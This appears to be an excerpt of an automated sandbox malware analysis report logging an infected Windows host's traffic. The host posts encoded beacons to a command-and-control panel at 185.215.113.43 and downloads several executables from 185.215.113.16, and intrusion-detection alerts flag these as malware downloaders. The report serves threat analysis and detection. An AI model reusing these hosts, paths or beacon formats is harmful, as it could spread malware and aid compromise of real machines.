Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 31 32 42 37 35 42 33 35 46 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A79B12B75B35F82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: Joe Sandbox View IP Address: 185.215.113.43 185.215.113.43
Source: Joe Sandbox View IP Address: 34.149.100.209 34.149.100.209
Source: Joe Sandbox View ASN Name: WHOLESALECONNECTIONSNL WHOLESALECONNECTIONSNL
Source: Joe Sandbox View JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
Source: Joe Sandbox View JA3 fingerprint: fb0aa01abe9d8e4037eb3473ca6e2dca
Source: Network traffic Suricata IDS: 2019714 - Severity 2 - ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile : 192.168.2.4:49738 -> 185.215.113.16:80
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49814 -> 185.215.113.16:80
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49849 -> 185.215.113.16:80
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49891 -> 185.215.113.16:80
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49924 -> 185.215.113.16:80
Source: Network traffic Suricata IDS: 2019714 - Severity 2 - ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile : 192.168.2.4:49924 -> 185.215.113.16:80
Source: Network traffic Suricata IDS: 2019714 - Severity 2 - ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile : 192.168.2.4:50050 -> 185.215.113.16:80
Source: Network traffic Suricata IDS: 2019714 - Severity 2 - ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile : 192.168.2.4:49930 -> 185.215.113.16:80
Source: Network traffic Suricata IDS: 2019714 - Severity 2 - ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile : 192.168.2.4:58630 -> 185.215.113.16:80
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: global traffic HTTP traffic detected: GET /off/def.exe HTTP/1.1 | Connection: Keep-Alive | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Host: 185.215.113.16
Source: global traffic HTTP traffic detected: GET /mine/random.exe HTTP/1.1 | Connection: Keep-Alive | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Host: 185.215.113.16
Source: global traffic HTTP traffic detected: GET /luma/random.exe HTTP/1.1 | Host: 185.215.113.16
Source: global traffic HTTP traffic detected: GET /steam/random.exe HTTP/1.1 | Host: 185.215.113.16
Source: global traffic HTTP traffic detected: GET / HTTP/1.1 | Host: 185.215.113.206 | Connection: Keep-Alive | Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /well/random.exe HTTP/1.1 | Host: 185.215.113.16
Source: global traffic HTTP traffic detected: GET /test/num.exe HTTP/1.1 | Host: 185.215.113.16
Source: global traffic HTTP traffic detected: GET /off/def.exe HTTP/1.1 | Connection: Keep-Alive | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Host: 185.215.113.16
Source: global traffic HTTP traffic detected: GET / HTTP/1.1 | Host: 185.215.113.206 | Connection: Keep-Alive | Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET / HTTP/1.1 | Host: 185.215.113.206 | Connection: Keep-Alive | Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /canonical.html HTTP/1.1 | Host: detectportal.firefox.com | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 | Accept: */* | Accept-Language: en-US,en;q=0.5 | Accept-Encoding: gzip, deflate | Cache-Control: no-cache | Pragma: no-cache | Connection: keep-alive
Source: global traffic HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1 | Host: detectportal.firefox.com | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 | Accept: */* | Accept-Language: en-US,en;q=0.5 | Accept-Encoding: gzip, deflate | Connection: keep-alive | Pragma: no-cache | Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /canonical.html HTTP/1.1 | Host: detectportal.firefox.com | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 | Accept: */* | Accept-Language: en-US,en;q=0.5 | Accept-Encoding: gzip, deflate | Cache-Control: no-cache | Pragma: no-cache | Connection: keep-alive
Source: global traffic HTTP traffic detected: GET /off/def.exe HTTP/1.1 | Connection: Keep-Alive | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Host: 185.215.113.16
Source: global traffic HTTP traffic detected: GET /mine/random.exe HTTP/1.1 | Connection: Keep-Alive | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Host: 185.215.113.16
Source: global traffic HTTP traffic detected: GET / HTTP/1.1 | Host: 185.215.113.206 | Connection: Keep-Alive | Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /canonical.html HTTP/1.1 | Host: detectportal.firefox.com | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 | Accept: */* | Accept-Language: en-US,en;q=0.5 | Accept-Encoding: gzip, deflate | Cache-Control: no-cache | Pragma: no-cache | Connection: keep-alive
Source: global traffic HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1 | Host: detectportal.firefox.com | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 | Accept: */* | Accept-Language: en-US,en;q=0.5 | Accept-Encoding: gzip, deflate | Connection: keep-alive | Pragma: no-cache | Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /canonical.html HTTP/1.1 | Host: detectportal.firefox.com | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 | Accept: */* | Accept-Language: en-US,en;q=0.5 | Accept-Encoding: gzip, deflate | Cache-Control: no-cache | Pragma: no-cache | Connection: keep-alive
Source: global traffic HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1 | Host: detectportal.firefox.com | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 | Accept: */* | Accept-Language: en-US,en;q=0.5 | Accept-Encoding: gzip, deflate | Connection: keep-alive | Pragma: no-cache | Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /canonical.html HTTP/1.1 | Host: detectportal.firefox.com | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 | Accept: */* | Accept-Language: en-US,en;q=0.5 | Accept-Encoding: gzip, deflate | Cache-Control: no-cache | Pragma: no-cache | Connection: keep-alive
Source: global traffic HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1 | Host: detectportal.firefox.com | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 | Accept: */* | Accept-Language: en-US,en;q=0.5 | Accept-Encoding: gzip, deflate | Connection: keep-alive | Pragma: no-cache | Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /canonical.html HTTP/1.1 | Host: detectportal.firefox.com | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 | Accept: */* | Accept-Language: en-US,en;q=0.5 | Accept-Encoding: gzip, deflate | Cache-Control: no-cache | Pragma: no-cache | Connection: keep-alive
Source: global traffic HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1 | Host: detectportal.firefox.com | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 | Accept: */* | Accept-Language: en-US,en;q=0.5 | Accept-Encoding: gzip, deflate | Connection: keep-alive | Pragma: no-cache | Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /canonical.html HTTP/1.1 | Host: detectportal.firefox.com | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 | Accept: */* | Accept-Language: en-US,en;q=0.5 | Accept-Encoding: gzip, deflate | Cache-Control: no-cache | Pragma: no-cache | Connection: keep-alive
Source: global traffic HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1 | Host: detectportal.firefox.com | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 | Accept: */* | Accept-Language: en-US,en;q=0.5 | Accept-Encoding: gzip, deflate | Connection: keep-alive | Pragma: no-cache | Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /canonical.html HTTP/1.1 | Host: detectportal.firefox.com | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 | Accept: */* | Accept-Language: en-US,en;q=0.5 | Accept-Encoding: gzip, deflate | Cache-Control: no-cache | Pragma: no-cache | Connection: keep-alive
Source: global traffic HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1 | Host: detectportal.firefox.com | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 | Accept: */* | Accept-Language: en-US,en;q=0.5 | Accept-Encoding: gzip, deflate | Connection: keep-alive | Pragma: no-cache | Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /canonical.html HTTP/1.1 | Host: detectportal.firefox.com | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 | Accept: */* | Accept-Language: en-US,en;q=0.5 | Accept-Encoding: gzip, deflate | Cache-Control: no-cache | Pragma: no-cache | Connection: keep-alive
Source: global traffic HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1 | Host: detectportal.firefox.com | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 | Accept: */* | Accept-Language: en-US,en;q=0.5 | Accept-Encoding: gzip, deflate | Connection: keep-alive | Pragma: no-cache | Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /mine/random.exe HTTP/1.1 | Connection: Keep-Alive | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Host: 185.215.113.16
Source: global traffic HTTP traffic detected: GET / HTTP/1.1 | Host: 185.215.113.206 | Connection: Keep-Alive | Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /off/def.exe HTTP/1.1 | Connection: Keep-Alive | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Host: 185.215.113.16
Source: global traffic HTTP traffic detected: GET /canonical.html HTTP/1.1 | Host: detectportal.firefox.com | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 | Accept: */* | Accept-Language: en-US,en;q=0.5 | Accept-Encoding: gzip, deflate | Cache-Control: no-cache | Pragma: no-cache | Connection: keep-alive
Source: global traffic HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1 | Host: detectportal.firefox.com | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 | Accept: */* | Accept-Language: en-US,en;q=0.5 | Accept-Encoding: gzip, deflate | Connection: keep-alive | Pragma: no-cache | Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /mine/random.exe HTTP/1.1 | Connection: Keep-Alive | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Host: 185.215.113.16
Source: global traffic HTTP traffic detected: GET /canonical.html HTTP/1.1 | Host: detectportal.firefox.com | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 | Accept: */* | Accept-Language: en-US,en;q=0.5 | Accept-Encoding: gzip, deflate | Cache-Control: no-cache | Pragma: no-cache | Connection: keep-alive
Source: global traffic HTTP traffic detected: GET /canonical.html HTTP/1.1 | Host: detectportal.firefox.com | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 | Accept: */* | Accept-Language: en-US,en;q=0.5 | Accept-Encoding: gzip, deflate | Cache-Control: no-cache | Pragma: no-cache | Connection: keep-alive
Source: global traffic HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1 | Host: detectportal.firefox.com | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 | Accept: */* | Accept-Language: en-US,en;q=0.5 | Accept-Encoding: gzip, deflate | Connection: keep-alive | Pragma: no-cache | Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /canonical.html HTTP/1.1 | Host: detectportal.firefox.com | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 | Accept: */* | Accept-Language: en-US,en;q=0.5 | Accept-Encoding: gzip, deflate | Cache-Control: no-cache | Pragma: no-cache | Connection: keep-alive
Source: global traffic HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1 | Host: detectportal.firefox.com | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 | Accept: */* | Accept-Language: en-US,en;q=0.5 | Accept-Encoding: gzip, deflate | Connection: keep-alive | Pragma: no-cache | Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1 | Host: detectportal.firefox.com | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 | Accept: */* | Accept-Language: en-US,en;q=0.5 | Accept-Encoding: gzip, deflate | Connection: keep-alive | Pragma: no-cache | Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /canonical.html HTTP/1.1 | Host: detectportal.firefox.com | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 | Accept: */* | Accept-Language: en-US,en;q=0.5 | Accept-Encoding: gzip, deflate | Cache-Control: no-cache | Pragma: no-cache | Connection: keep-alive
Source: global traffic HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1 | Host: detectportal.firefox.com | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 | Accept: */* | Accept-Language: en-US,en;q=0.5 | Accept-Encoding: gzip, deflate | Connection: keep-alive | Pragma: no-cache | Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /canonical.html HTTP/1.1 | Host: detectportal.firefox.com | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 | Accept: */* | Accept-Language: en-US,en;q=0.5 | Accept-Encoding: gzip, deflate | Cache-Control: no-cache | Pragma: no-cache | Connection: keep-alive
Source: global traffic HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1 | Host: detectportal.firefox.com | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 | Accept: */* | Accept-Language: en-US,en;q=0.5 | Accept-Encoding: gzip, deflate | Connection: keep-alive | Pragma: no-cache | Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /canonical.html HTTP/1.1 | Host: detectportal.firefox.com | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 | Accept: */* | Accept-Language: en-US,en;q=0.5 | Accept-Encoding: gzip, deflate | Cache-Control: no-cache | Pragma: no-cache | Connection: keep-alive
Source: global traffic HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1 | Host: detectportal.firefox.com | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 | Accept: */* | Accept-Language: en-US,en;q=0.5 | Accept-Encoding: gzip, deflate | Connection: keep-alive | Pragma: no-cache | Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /canonical.html HTTP/1.1 | Host: detectportal.firefox.com | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 | Accept: */* | Accept-Language: en-US,en;q=0.5 | Accept-Encoding: gzip, deflate | Cache-Control: no-cache | Pragma: no-cache | Connection: keep-alive
Source: global traffic HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1 | Host: detectportal.firefox.com | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 | Accept: */* | Accept-Language: en-US,en;q=0.5 | Accept-Encoding: gzip, deflate | Connection: keep-alive | Pragma: no-cache | Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET / HTTP/1.1 | Host: 185.215.113.206 | Connection: Keep-Alive | Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /canonical.html HTTP/1.1 | Host: detectportal.firefox.com | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 | Accept: */* | Accept-Language: en-US,en;q=0.5 | Accept-Encoding: gzip, deflate | Cache-Control: no-cache | Pragma: no-cache | Connection: keep-alive
Source: global traffic HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1 | Host: detectportal.firefox.com | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 | Accept: */* | Accept-Language: en-US,en;q=0.5 | Accept-Encoding: gzip, deflate | Connection: keep-alive | Pragma: no-cache | Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /canonical.html HTTP/1.1 | Host: detectportal.firefox.com | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 | Accept: */* | Accept-Language: en-US,en;q=0.5 | Accept-Encoding: gzip, deflate | Cache-Control: no-cache | Pragma: no-cache | Connection: keep-alive
Source: global traffic HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1 | Host: detectportal.firefox.com | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 | Accept: */* | Accept-Language: en-US,en;q=0.5 | Accept-Encoding: gzip, deflate | Connection: keep-alive | Pragma: no-cache | Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /canonical.html HTTP/1.1 | Host: detectportal.firefox.com | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 | Accept: */* | Accept-Language: en-US,en;q=0.5 | Accept-Encoding: gzip, deflate | Cache-Control: no-cache | Pragma: no-cache | Connection: keep-alive
Source: global traffic HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1 | Host: detectportal.firefox.com | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 | Accept: */* | Accept-Language: en-US,en;q=0.5 | Accept-Encoding: gzip, deflate | Connection: keep-alive | Pragma: no-cache | Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /canonical.html HTTP/1.1 | Host: detectportal.firefox.com | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 | Accept: */* | Accept-Language: en-US,en;q=0.5 | Accept-Encoding: gzip, deflate | Cache-Control: no-cache | Pragma: no-cache | Connection: keep-alive
Source: global traffic HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1 | Host: detectportal.firefox.com | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 | Accept: */* | Accept-Language: en-US,en;q=0.5 | Accept-Encoding: gzip, deflate | Connection: keep-alive | Pragma: no-cache | Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /canonical.html HTTP/1.1 | Host: detectportal.firefox.com | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 | Accept: */* | Accept-Language: en-US,en;q=0.5 | Accept-Encoding: gzip, deflate | Cache-Control: no-cache | Pragma: no-cache | Connection: keep-alive
Source: global traffic HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1 | Host: detectportal.firefox.com | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 | Accept: */* | Accept-Language: en-US,en;q=0.5 | Accept-Encoding: gzip, deflate | Connection: keep-alive | Pragma: no-cache | Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /canonical.html HTTP/1.1 | Host: detectportal.firefox.com | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 | Accept: */* | Accept-Language: en-US,en;q=0.5 | Accept-Encoding: gzip, deflate | Cache-Control: no-cache | Pragma: no-cache | Connection: keep-alive
Source: global traffic HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1 | Host: detectportal.firefox.com | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 | Accept: */* | Accept-Language: en-US,en;q=0.5 | Accept-Encoding: gzip, deflate | Connection: keep-alive | Pragma: no-cache | Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /canonical.html HTTP/1.1 | Host: detectportal.firefox.com | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 | Accept: */* | Accept-Language: en-US,en;q=0.5 | Accept-Encoding: gzip, deflate | Cache-Control: no-cache | Pragma: no-cache | Connection: keep-alive
Source: global traffic HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1 | Host: detectportal.firefox.com | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 | Accept: */* | Accept-Language: en-US,en;q=0.5 | Accept-Encoding: gzip, deflate | Connection: keep-alive | Pragma: no-cache | Cache-Control: no-cache
Source: firefox.exe, 0000001B.00000002.2757990027.000001C172674000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.2749174259.000001C171903000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.2749174259.000001C171944000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: "url": "https://www.facebook.com/", equals www.facebook.com (Facebook)
Source: firefox.exe, 0000001B.00000002.2757990027.000001C172674000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.2749174259.000001C171903000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.2749174259.000001C171944000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: "url": "https://www.youtube.com/", equals www.youtube.com (Youtube)
Source: firefox.exe, 0000001B.00000002.2757990027.000001C172674000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.2749174259.000001C171903000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: "default.sites": "https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.reddit.com/,https://www.amazon.com/,https://twitter.com/", equals www.facebook.com (Facebook)
Source: firefox.exe, 0000001B.00000002.2757990027.000001C172674000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.2749174259.000001C171903000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: "default.sites": "https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.reddit.com/,https://www.amazon.com/,https://twitter.com/", equals www.twitter.com (Twitter)
Source: firefox.exe, 0000001B.00000002.2757990027.000001C172674000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.2749174259.000001C171903000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: "default.sites": "https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.reddit.com/,https://www.amazon.com/,https://twitter.com/", equals www.youtube.com (Youtube)
Source: firefox.exe, 0000001B.00000002.2746480848.000001C170DAF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: WHERE b.guid IN (https://vk.com/,https://www.youtube.com/,https://ok.ru/,https://www.avito.ru/,https://www.aliexpress.com/,https://www.wikipedia.org/UpdateService:selectUpdate - the user requires elevation to install this update, but the user has exceeded the max number of elevation attempts.AND (bookmarked OR frecency > 20) equals www.youtube.com (Youtube)
